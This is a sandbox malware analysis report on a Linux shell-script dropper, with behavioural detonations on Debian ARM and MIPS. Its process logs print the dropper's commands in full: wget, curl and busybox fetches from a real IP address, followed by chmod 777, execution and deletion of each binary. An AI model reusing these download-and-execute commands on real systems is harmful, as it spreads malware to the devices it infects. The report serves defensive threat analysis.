Malware Analysis Report

2025-05-06 04:16

Sample ID 241025-bw3pds1dpc
Target 48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh
SHA256 48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354
Tags
antivm defense_evasion discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354

Threat Level: Shows suspicious behavior

The file 48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm defense_evasion discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-25 01:30

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-25 01:30

Reported

2024-10-25 01:33

Platform

debian9-armhf-20240729-en

Max time kernel

22s

Max time network

24s

Command Line

[/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A

Processes

/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh

[/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

[wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/wget

[wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/831-1-0xb675e000-0xb676f044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-25 01:30

Reported

2024-10-25 01:33

Platform

debian9-mipsbe-20240729-en

Max time kernel

62s

Max time network

64s

Command Line

[/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
